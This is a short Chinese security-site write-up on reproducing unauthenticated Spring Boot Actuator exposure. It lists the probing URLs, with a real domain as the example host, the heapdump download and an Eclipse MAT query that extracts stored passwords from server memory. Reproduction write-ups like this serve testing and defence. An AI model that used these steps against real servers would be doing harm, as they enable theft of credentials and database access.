|
|
| 顶 | 踩 |
| 标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
| 详情 | |||||||||||||
|
[SAFE-ID: JIWO-2024-2934] 作者: 须臾 发表于: [2021-09-22]
本文共 [542] 位读者顶过
Spring Boot 提取内存密码
一、漏洞简介 二、漏洞影响 三、复现过程[出自:jiwo.org] > 访问如下路径如果有数据说明存在漏洞 **Spring Boot 1.x版本** `http://www.baidu.com:8090/env` **Spring Boot 2.x版本** `http://www.baidu.com:8090/actuator/env` > 当发现存在未授权漏洞时,可以直接访问 `/actuator/heapdump` 下载内存,提取密码 `http://www.baidu.com:8090/actuator/heapdump` > heapdump文件下载完成之后可以利用Eclipse Memory Analyzer 来解析内存文件 ``` http://www.eclipse.org/mat/downloads.php ``` > 匹配内存中password字符串,并不一定能匹配完,可以通过`/actuator/env`得到的`JDBC`信息再来匹配关键字 `select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))` |
|||||||||||||
|
|
|
| 顶 | 踩 |